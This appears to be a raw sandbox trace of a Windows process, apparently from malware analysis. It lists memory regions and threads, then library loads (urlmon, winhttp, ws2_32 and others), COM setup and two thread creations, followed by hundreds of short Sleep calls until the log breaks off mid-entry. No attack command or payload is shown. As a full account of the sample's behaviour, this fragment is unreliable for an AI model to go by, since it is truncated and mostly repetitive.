Region: id = 16836 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16837 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16838 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16839 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 16840 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16841 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16842 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16843 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16844 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 16845 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16846 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16847 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16848 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 16849 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16850 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16851 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16852 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 16853 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16854 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16855 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16856 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16857 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 16858 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16859 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16860 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16861 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 16862 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16863 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16864 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Thread: id = 5 os_tid = 0x1090 Thread: id = 6 os_tid = 0x1068 Thread: id = 7 os_tid = 0xe40 Thread: id = 8 os_tid = 0xd94 Thread: id = 9 os_tid = 0xd50 Thread: id = 10 os_tid = 0xd4c Thread: id = 11 os_tid = 0x7a8 Thread: id = 12 os_tid = 0x568 Thread: id = 13 os_tid = 0x3ac Thread: id = 14 os_tid = 0x5e4 Thread: id = 15 os_tid = 0x29c Thread: id = 16 os_tid = 0xacc Thread: id = 17 os_tid = 0xa58 Thread: id = 18 os_tid = 0xb70 Thread: id = 19 os_tid = 0xa64 Thread: id = 20 os_tid = 0xa50 Thread: id = 21 os_tid = 0xa4c Thread: id = 22 os_tid = 0xa48 Thread: id = 23 os_tid = 0xa44 Thread: id = 24 os_tid = 0xa40 Thread: id = 25 os_tid = 0xa24 Thread: id = 26 os_tid = 0xa20 Thread: id = 27 os_tid = 0x9e4 Thread: id = 28 os_tid = 0x880 Thread: id = 29 os_tid = 0x874 Thread: id = 30 os_tid = 0x84c Thread: id = 31 os_tid = 0x844 Thread: id = 32 os_tid = 0x83c Thread: id = 33 os_tid = 0x818 Thread: id = 34 os_tid = 0x814 Thread: id = 35 os_tid = 0x80c Thread: id = 36 os_tid = 0x804 Thread: id = 37 os_tid = 0x498 Thread: id = 38 os_tid = 0x694 Thread: id = 39 os_tid = 0x43c Thread: id = 40 os_tid = 0x490 Thread: id = 41 os_tid = 0x4b0 Thread: id = 42 os_tid = 0x494 Thread: id = 43 os_tid = 0x724 Thread: id = 44 os_tid = 0x5e8 Thread: id = 45 os_tid = 0x6c4 Thread: id = 46 os_tid = 0x6b8 Thread: id = 47 os_tid = 0x7b8 Thread: id = 48 os_tid = 0x10a8 [0093.861] LoadLibraryA (lpLibFileName="NTDLL") returned 0x7ffa16770000 [0093.862] GetProcAddress (hModule=0x7ffa16770000, lpProcName="RtlExitUserThread") returned 0x7ffa167cc2a0 [0093.864] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x8000000 [0096.932] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10) returned 0x8000830 [0096.932] LoadLibraryA (lpLibFileName="user32") returned 0x7ffa13d80000 [0096.932] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x10 [0096.939] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0096.939] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8000830 [0096.940] LoadLibraryA (lpLibFileName="advapi32") returned 0x7ffa15090000 [0096.940] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x12 [0096.941] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0096.941] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10) returned 0x8000830 [0096.941] LoadLibraryA (lpLibFileName="urlmon") returned 0x7ffa09580000 [0096.941] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x10 [0096.941] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0096.941] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0xf) returned 0x8000830 [0096.942] LoadLibraryA (lpLibFileName="ole32") returned 0x7ffa13b70000 [0096.942] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0xf [0096.942] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0096.942] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x11) returned 0x8000830 [0096.942] LoadLibraryA (lpLibFileName="winhttp") returned 0x7ffa0ed60000 [0096.943] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x11 [0096.943] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0096.943] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10) returned 0x8000830 [0096.943] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7ffa146e0000 [0096.944] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x10 [0096.944] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0096.944] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10) returned 0x8000830 [0096.944] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7ffa11800000 [0096.961] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x10 [0096.961] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0096.961] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x11) returned 0x8000830 [0096.961] LoadLibraryA (lpLibFileName="shell32") returned 0x7ffa15210000 [0096.962] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x11 [0096.962] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0096.963] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0096.964] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoInitializeEx") returned 0x7ffa143a2c50 [0096.964] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0096.965] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoInitializeSecurity") returned 0x7ffa14375fe0 [0096.965] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0096.966] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoCreateInstance") returned 0x7ffa143dfb70 [0096.966] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffa14340000 [0096.967] GetProcAddress (hModule=0x7ffa14340000, lpProcName="CoUninitialize") returned 0x7ffa143a1540 [0096.968] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x563ca4, lpParameter=0x550000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb7c [0096.968] CloseHandle (hObject=0xb7c) returned 1 [0096.968] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x563d80, lpParameter=0x550000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb7c [0096.969] CloseHandle (hObject=0xb7c) returned 1 [0096.969] Sleep (dwMilliseconds=0xa) [0097.027] Sleep (dwMilliseconds=0xa) [0097.073] Sleep (dwMilliseconds=0xa) [0097.119] Sleep (dwMilliseconds=0xa) [0097.165] Sleep (dwMilliseconds=0xa) [0097.187] Sleep (dwMilliseconds=0xa) [0097.211] Sleep (dwMilliseconds=0xa) [0097.258] Sleep (dwMilliseconds=0xa) [0097.364] Sleep (dwMilliseconds=0xa) [0097.415] Sleep (dwMilliseconds=0xa) [0097.462] Sleep (dwMilliseconds=0xa) [0097.510] Sleep (dwMilliseconds=0xa) [0097.557] Sleep (dwMilliseconds=0xa) [0097.573] Sleep (dwMilliseconds=0xa) [0097.589] Sleep (dwMilliseconds=0xa) [0097.604] Sleep (dwMilliseconds=0xa) [0097.626] Sleep (dwMilliseconds=0xa) [0097.652] Sleep (dwMilliseconds=0xa) [0097.665] Sleep (dwMilliseconds=0xa) [0097.717] Sleep (dwMilliseconds=0xa) [0097.766] Sleep (dwMilliseconds=0xa) [0097.811] Sleep (dwMilliseconds=0xa) [0097.837] Sleep (dwMilliseconds=0xa) [0097.883] Sleep (dwMilliseconds=0xa) [0097.930] Sleep (dwMilliseconds=0xa) [0098.065] Sleep (dwMilliseconds=0xa) [0098.091] Sleep (dwMilliseconds=0xa) [0098.119] Sleep (dwMilliseconds=0xa) [0098.135] Sleep (dwMilliseconds=0xa) [0098.168] Sleep (dwMilliseconds=0xa) [0098.242] Sleep (dwMilliseconds=0xa) [0098.414] Sleep (dwMilliseconds=0xa) [0098.540] Sleep (dwMilliseconds=0xa) [0098.696] Sleep (dwMilliseconds=0xa) [0098.831] Sleep (dwMilliseconds=0xa) [0098.871] Sleep (dwMilliseconds=0xa) [0098.885] Sleep (dwMilliseconds=0xa) [0098.899] Sleep (dwMilliseconds=0xa) [0098.919] Sleep (dwMilliseconds=0xa) [0099.008] Sleep (dwMilliseconds=0xa) [0099.062] Sleep (dwMilliseconds=0xa) [0099.168] Sleep (dwMilliseconds=0xa) [0099.214] Sleep (dwMilliseconds=0xa) [0099.255] Sleep (dwMilliseconds=0xa) [0099.274] Sleep (dwMilliseconds=0xa) [0099.291] Sleep (dwMilliseconds=0xa) [0099.305] Sleep (dwMilliseconds=0xa) [0099.335] Sleep (dwMilliseconds=0xa) [0099.385] Sleep (dwMilliseconds=0xa) [0099.797] Sleep (dwMilliseconds=0xa) [0099.837] Sleep (dwMilliseconds=0xa) [0099.853] Sleep (dwMilliseconds=0xa) [0099.868] Sleep (dwMilliseconds=0xa) [0099.896] Sleep (dwMilliseconds=0xa) [0099.931] Sleep (dwMilliseconds=0xa) [0100.028] Sleep (dwMilliseconds=0xa) [0100.133] Sleep (dwMilliseconds=0xa) [0100.149] Sleep (dwMilliseconds=0xa) [0100.168] Sleep (dwMilliseconds=0xa) [0100.188] Sleep (dwMilliseconds=0xa) [0100.247] Sleep (dwMilliseconds=0xa) [0100.421] Sleep (dwMilliseconds=0xa) [0100.466] Sleep (dwMilliseconds=0xa) [0100.484] Sleep (dwMilliseconds=0xa) [0100.506] Sleep (dwMilliseconds=0xa) [0100.579] Sleep (dwMilliseconds=0xa) [0100.736] Sleep (dwMilliseconds=0xa) [0100.824] Sleep (dwMilliseconds=0xa) [0100.843] Sleep (dwMilliseconds=0xa) [0100.859] Sleep (dwMilliseconds=0xa) [0100.906] Sleep (dwMilliseconds=0xa) [0101.056] Sleep (dwMilliseconds=0xa) [0101.078] Sleep (dwMilliseconds=0xa) [0101.098] Sleep (dwMilliseconds=0xa) [0101.141] Sleep (dwMilliseconds=0xa) [0101.220] Sleep (dwMilliseconds=0xa) [0101.270] Sleep (dwMilliseconds=0xa) [0101.305] Sleep (dwMilliseconds=0xa) [0101.360] Sleep (dwMilliseconds=0xa) [0101.426] Sleep (dwMilliseconds=0xa) [0101.654] Sleep (dwMilliseconds=0xa) [0101.702] Sleep (dwMilliseconds=0xa) [0101.720] Sleep (dwMilliseconds=0xa) [0101.765] Sleep (dwMilliseconds=0xa) [0101.813] Sleep (dwMilliseconds=0xa) [0101.945] Sleep (dwMilliseconds=0xa) [0101.998] Sleep (dwMilliseconds=0xa) [0102.021] Sleep (dwMilliseconds=0xa) [0102.053] Sleep (dwMilliseconds=0xa) [0102.069] Sleep (dwMilliseconds=0xa) [0102.082] Sleep (dwMilliseconds=0xa) [0102.145] Sleep (dwMilliseconds=0xa) [0102.216] Sleep (dwMilliseconds=0xa) [0102.237] Sleep (dwMilliseconds=0xa) [0102.290] Sleep (dwMilliseconds=0xa) [0102.646] Sleep (dwMilliseconds=0xa) [0102.735] Sleep (dwMilliseconds=0xa) [0102.777] Sleep (dwMilliseconds=0xa) [0102.797] Sleep (dwMilliseconds=0xa) [0102.821] Sleep (dwMilliseconds=0xa) [0102.843] Sleep (dwMilliseconds=0xa) [0102.899] Sleep (dwMilliseconds=0xa) [0103.118] Sleep (dwMilliseconds=0xa) [0103.243] Sleep (dwMilliseconds=0xa) [0103.292] Sleep (dwMilliseconds=0xa) [0103.338] Sleep (dwMilliseconds=0xa) [0103.378] Sleep (dwMilliseconds=0xa) [0103.401] Sleep (dwMilliseconds=0xa) [0103.465] Sleep (dwMilliseconds=0xa) [0103.648] Sleep (dwMilliseconds=0xa) [0103.697] Sleep (dwMilliseconds=0xa) [0103.714] Sleep (dwMilliseconds=0xa) [0103.735] Sleep (dwMilliseconds=0xa) [0103.775] Sleep (dwMilliseconds=0xa) [0103.832] Sleep (dwMilliseconds=0xa) [0103.993] Sleep (dwMilliseconds=0xa) [0104.042] Sleep (dwMilliseconds=0xa) [0104.057] Sleep (dwMilliseconds=0xa) [0104.071] Sleep (dwMilliseconds=0xa) [0104.133] Sleep (dwMilliseconds=0xa) [0104.353] Sleep (dwMilliseconds=0xa) [0104.461] Sleep (dwMilliseconds=0xa) [0104.508] Sleep (dwMilliseconds=0xa) [0104.525] Sleep (dwMilliseconds=0xa) [0104.541] Sleep (dwMilliseconds=0xa) [0104.602] Sleep (dwMilliseconds=0xa) [0104.860] Sleep (dwMilliseconds=0xa) [0104.901] Sleep (dwMilliseconds=0xa) [0104.932] Sleep (dwMilliseconds=0xa) [0104.948] Sleep (dwMilliseconds=0xa) [0104.986] Sleep (dwMilliseconds=0xa) [0105.012] Sleep (dwMilliseconds=0xa) [0105.054] Sleep (dwMilliseconds=0xa) [0105.194] Sleep (dwMilliseconds=0xa) [0105.218] Sleep (dwMilliseconds=0xa) [0105.245] Sleep (dwMilliseconds=0xa) [0105.282] Sleep (dwMilliseconds=0xa) [0105.367] Sleep (dwMilliseconds=0xa) [0105.680] Sleep (dwMilliseconds=0xa) [0105.762] Sleep (dwMilliseconds=0xa) [0105.795] Sleep (dwMilliseconds=0xa) [0105.828] Sleep (dwMilliseconds=0xa) [0105.849] Sleep (dwMilliseconds=0xa) [0105.891] Sleep (dwMilliseconds=0xa) [0105.992] Sleep (dwMilliseconds=0xa) [0106.298] Sleep (dwMilliseconds=0xa) [0106.318] Sleep (dwMilliseconds=0xa) [0106.340] Sleep (dwMilliseconds=0xa) [0106.398] Sleep (dwMilliseconds=0xa) [0106.650] Sleep (dwMilliseconds=0xa) [0106.942] Sleep (dwMilliseconds=0xa) [0107.049] Sleep (dwMilliseconds=0xa) [0107.066] Sleep (dwMilliseconds=0xa) [0107.159] Sleep (dwMilliseconds=0xa) [0107.488] Sleep (dwMilliseconds=0xa) [0107.554] Sleep (dwMilliseconds=0xa) [0107.580] Sleep (dwMilliseconds=0xa) [0107.614] Sleep (dwMilliseconds=0xa) [0107.633] Sleep (dwMilliseconds=0xa) [0107.695] Sleep (dwMilliseconds=0xa) [0107.816] Sleep (dwMilliseconds=0xa) [0107.867] Sleep (dwMilliseconds=0xa) [0107.913] Sleep (dwMilliseconds=0xa) [0107.927] Sleep (dwMilliseconds=0xa) [0107.942] Sleep (dwMilliseconds=0xa) [0107.957] Sleep (dwMilliseconds=0xa) [0108.022] Sleep (dwMilliseconds=0xa) [0108.176] Sleep (dwMilliseconds=0xa) [0108.207] Sleep (dwMilliseconds=0xa) [0108.223] Sleep (dwMilliseconds=0xa) [0108.241] Sleep (dwMilliseconds=0xa) [0108.256] Sleep (dwMilliseconds=0xa) [0108.317] Sleep (dwMilliseconds=0xa) [0108.410] Sleep (dwMilliseconds=0xa) [0108.481] Sleep (dwMilliseconds=0xa) [0108.521] Sleep (dwMilliseconds=0xa) [0108.591] Sleep (dwMilliseconds=0xa) [0108.660] Sleep (dwMilliseconds=0xa) [0108.724] Sleep (dwMilliseconds=0xa) [0108.849] Sleep (dwMilliseconds=0xa) [0108.938] Sleep (dwMilliseconds=0xa) [0108.968] Sleep (dwMilliseconds=0xa) [0109.020] Sleep (dwMilliseconds=0xa) [0109.040] Sleep (dwMilliseconds=0xa) [0109.112] Sleep (dwMilliseconds=0xa) [0109.149] Sleep (dwMilliseconds=0xa) [0109.210] Sleep (dwMilliseconds=0xa) [0109.257] Sleep (dwMilliseconds=0xa) [0109.303] Sleep (dwMilliseconds=0xa) [0109.331] Sleep (dwMilliseconds=0xa) [0109.348] Sleep (dwMilliseconds=0xa) [0109.364] Sleep (dwMilliseconds=0xa) [0109.426] Sleep (dwMilliseconds=0xa) [0109.601] Sleep (dwMilliseconds=0xa) [0109.660] Sleep (dwMilliseconds=0xa) [0109.700] Sleep (dwMilliseconds=0xa) [0109.723] Sleep (dwMilliseconds=0xa) [0109.739] Sleep (dwMilliseconds=0xa) [0109.755] Sleep (dwMilliseconds=0xa) [0109.802] Sleep (dwMilliseconds=0xa) [0109.896] Sleep (dwMilliseconds=0xa) [0110.020] Sleep (dwMilliseconds=0xa) [0110.083] Sleep (dwMilliseconds=0xa) [0110.131] Sleep (dwMilliseconds=0xa) [0110.209] Sleep (dwMilliseconds=0xa) [0110.224] Sleep (dwMilliseconds=0xa) [0110.249] Sleep (dwMilliseconds=0xa) [0110.308] Sleep (dwMilliseconds=0xa) [0110.485] Sleep (dwMilliseconds=0xa) [0110.552] Sleep (dwMilliseconds=0xa) [0110.578] Sleep (dwMilliseconds=0xa) [0110.608] Sleep (dwMilliseconds=0xa) [0110.656] Sleep (dwMilliseconds=0xa) [0110.735] Sleep (dwMilliseconds=0xa) [0110.796] Sleep (dwMilliseconds=0xa) [0110.838] Sleep (dwMilliseconds=0xa) [0110.938] Sleep (dwMilliseconds=0xa) [0110.984] Sleep (dwMilliseconds=0xa) [0111.067] Sleep (dwMilliseconds=0xa) [0111.163] Sleep (dwMilliseconds=0xa) [0111.217] Sleep (dwMilliseconds=0xa) [0111.266] Sleep (dwMilliseconds=0xa) [0111.288] Sleep (dwMilliseconds=0xa) [0111.313] Sleep (dwMilliseconds=0xa) [0111.328] Sleep (dwMilliseconds=0xa) [0111.612] Sleep (dwMilliseconds=0xa) [0111.668] Sleep (dwMilliseconds=0xa) [0111.697] Sleep (dwMilliseconds=0xa) [0111.722] Sleep (dwMilliseconds=0xa) [0111.736] Sleep (dwMilliseconds=0xa) [0111.749] Sleep (dwMilliseconds=0xa) [0111.766] Sleep (dwMilliseconds=0xa) [0111.783] Sleep (dwMilliseconds=0xa) [0111.843] Sleep (dwMilliseconds=0xa) [0111.902] Sleep (dwMilliseconds=0xa) [0111.921] Sleep (dwMilliseconds=0xa) [0111.940] Sleep (dwMilliseconds=0xa) [0111.952] Sleep (dwMilliseconds=0xa) [0111.968] Sleep (dwMilliseconds=0xa) [0111.985] Sleep (dwMilliseconds=0xa) [0112.037] Sleep (dwMilliseconds=0xa) [0112.066] Sleep (dwMilliseconds=0xa) [0112.078] Sleep (dwMilliseconds=0xa) [0112.093] Sleep (dwMilliseconds=0xa) [0112.109] Sleep (dwMilliseconds=0xa) [0112.124] Sleep (dwMilliseconds=0xa) [0112.141] Sleep (dwMilliseconds=0xa) [0112.155] Sleep (dwMilliseconds=0xa) [0112.171] Sleep (dwMilliseconds=0xa) [0112.218] Sleep (dwMilliseconds=0xa) [0112.242] Sleep (dwMilliseconds=0xa) [0112.264] Sleep (dwMilliseconds=0xa) [0112.280] Sleep (dwMilliseconds=0xa) [0112.298] Sleep (dwMilliseconds=0xa) [0112.312] Sleep (dwMilliseconds=0xa) [0112.325] Sleep (dwMilliseconds=0xa) [0112.392] Sleep (dwMilliseconds=0xa) [0112.437] Sleep (dwMilliseconds=0xa) [0112.457] Sleep (dwMilliseconds=0xa) [0112.468] Sleep (dwMilliseconds=0xa) [0112.494] Sleep (dwMilliseconds=0xa) [0112.508] Sleep (dwMilliseconds=0xa) [0112.525] Sleep (dwMilliseconds=0xa) [0112.592] Sleep (dwMilliseconds=0xa) [0112.634] Sleep (dwMilliseconds=0xa) [0112.653] Sleep (dwMilliseconds=0xa) [0112.664] Sleep (dwMilliseconds=0xa) [0112.680] Sleep (dwMilliseconds=0xa) [0112.697] Sleep (dwMilliseconds=0xa) [0112.713] Sleep (dwMilliseconds=0xa) [0112.819] Sleep (dwMilliseconds=0xa) [0112.869] Sleep (dwMilliseconds=0xa) [0112.885] Sleep (dwMilliseconds=0xa) [0112.898] Sleep (dwMilliseconds=0xa) [0112.914] Sleep (dwMilliseconds=0xa) [0112.931] Sleep (dwMilliseconds=0xa) [0112.945] Sleep (dwMilliseconds=0xa) [0112.961] Sleep (dwMilliseconds=0xa) [0112.976] Sleep (dwMilliseconds=0xa) [0112.993] Sleep (dwMilliseconds=0xa) [0113.039] Sleep (dwMilliseconds=0xa) [0113.061] Sleep (dwMilliseconds=0xa) [0113.086] Sleep (dwMilliseconds=0xa) [0113.101] Sleep (dwMilliseconds=0xa) [0113.117] Sleep (dwMilliseconds=0xa) [0113.132] Sleep (dwMilliseconds=0xa) [0113.149] Sleep (dwMilliseconds=0xa) [0113.211] Sleep (dwMilliseconds=0xa) [0113.238] Sleep (dwMilliseconds=0xa) [0113.267] Sleep (dwMilliseconds=0xa) [0113.296] Sleep (dwMilliseconds=0xa) [0113.327] Sleep (dwMilliseconds=0xa) [0113.398] Sleep (dwMilliseconds=0xa) [0113.453] Sleep (dwMilliseconds=0xa) [0113.483] Sleep (dwMilliseconds=0xa) [0113.508] Sleep (dwMilliseconds=0xa) [0113.526] Sleep (dwMilliseconds=0xa) [0113.542] Sleep (dwMilliseconds=0xa) [0113.597] Sleep (dwMilliseconds=0xa) [0113.642] Sleep (dwMilliseconds=0xa) [0113.665] Sleep (dwMilliseconds=0xa) [0113.680] Sleep (dwMilliseconds=0xa) [0113.696] Sleep (dwMilliseconds=0xa) [0113.711] Sleep (dwMilliseconds=0xa) [0113.727] Sleep (dwMilliseconds=0xa) [0113.788] Sleep (dwMilliseconds=0xa) [0113.815] Sleep (dwMilliseconds=0xa) [0113.835] Sleep (dwMilliseconds=0xa) [0113.851] Sleep (dwMilliseconds=0xa) [0113.868] Sleep (dwMilliseconds=0xa) [0113.898] Sleep (dwMilliseconds=0xa) [0113.945] Sleep (dwMilliseconds=0xa) [0114.039] Sleep (dwMilliseconds=0xa) [0114.117] Sleep (dwMilliseconds=0xa) [0114.163] Sleep (dwMilliseconds=0xa) [0114.210] Sleep (dwMilliseconds=0xa) [0114.301] Sleep (dwMilliseconds=0xa) [0114.338] Sleep (dwMilliseconds=0xa) [0114.351] Sleep (dwMilliseconds=0xa) [0114.368] Sleep (dwMilliseconds=0xa) [0114.383] Sleep (dwMilliseconds=0xa) [0114.398] Sleep (dwMilliseconds=0xa) [0114.414] Sleep (dwMilliseconds=0xa) [0114.432] Sleep (dwMilliseconds=0xa) [0114.445] Sleep (dwMilliseconds=0xa) [0114.494] Sleep (dwMilliseconds=0xa) [0114.526] Sleep (dwMilliseconds=0xa) [0114.539] Sleep (dwMilliseconds=0xa) [0114.555] Sleep (dwMilliseconds=0xa) [0114.574] Sleep (dwMilliseconds=0xa) [0114.594] Sleep (dwMilliseconds=0xa) [0114.634] Sleep (dwMilliseconds=0xa) [0114.680] Sleep (dwMilliseconds=0xa) [0114.711] Sleep (dwMilliseconds=0xa) [0114.727] Sleep (dwMilliseconds=0xa) [0114.742] Sleep (dwMilliseconds=0xa) [0114.759] Sleep (dwMilliseconds=0xa) [0114.794] Sleep (dwMilliseconds=0xa) [0114.884] Sleep (dwMilliseconds=0xa) [0114.949] Sleep (dwMilliseconds=0xa) [0114.967] Sleep (dwMilliseconds=0xa) [0115.017] Sleep (dwMilliseconds=0xa) [0115.055] Sleep (dwMilliseconds=0xa) [0115.072] Sleep (dwMilliseconds=0xa) [0115.172] Sleep (dwMilliseconds=0xa) [0115.207] Sleep (dwMilliseconds=0xa) [0115.229] Sleep (dwMilliseconds=0xa) [0115.244] Sleep (dwMilliseconds=0xa) [0115.258] Sleep (dwMilliseconds=0xa) [0115.277] Sleep (dwMilliseconds=0xa) [0115.289] Sleep (dwMilliseconds=0xa) [0115.304] Sleep (dwMilliseconds=0xa) [0115.321] Sleep (dwMilliseconds=0xa) [0115.356] Sleep (dwMilliseconds=0xa) [0115.407] Sleep (dwMilliseconds=0xa) [0115.435] Sleep (dwMilliseconds=0xa) [0115.450] Sleep (dwMilliseconds=0xa) [0115.466] Sleep (dwMilliseconds=0xa) [0115.480] Sleep (dwMilliseconds=0xa) [0115.499] Sleep (dwMilliseconds=0xa) [0115.511] Sleep (dwMilliseconds=0xa) [0115.529] Sleep (dwMilliseconds=0xa) [0115.545] Sleep (dwMilliseconds=0xa) [0115.602] Sleep (dwMilliseconds=0xa) [0115.660] Sleep (dwMilliseconds=0xa) [0115.683] Sleep (dwMilliseconds=0xa) [0115.703] Sleep (dwMilliseconds=0xa) [0115.729] Sleep (dwMilliseconds=0xa) [0115.746] Sleep (dwMilliseconds=0xa) [0115.810] Sleep (dwMilliseconds=0xa) [0115.848] Sleep (dwMilliseconds=0xa) [0115.870] Sleep (dwMilliseconds=0xa) [0115.890] Sleep (dwMilliseconds=0xa) [0115.910] Sleep (dwMilliseconds=0xa) [0115.943] Sleep (dwMilliseconds=0xa) [0116.000] Sleep (dwMilliseconds=0xa) [0116.050] Sleep (dwMilliseconds=0xa) [0116.074] Sleep (dwMilliseconds=0xa) [0116.089] Sleep (dwMilliseconds=0xa) [0116.165] Sleep (dwMilliseconds=0xa) [0116.215] Sleep (dwMilliseconds=0xa) [0116.246] Sleep (dwMilliseconds=0xa) [0116.262] Sleep (dwMilliseconds=0xa) [0116.280] Sleep (dwMilliseconds=0xa) [0116.292] Sleep (dwMilliseconds=0xa) [0116.310] Sleep (dwMilliseconds=0xa) [0116.323] Sleep (dwMilliseconds=0xa) [0116.339] 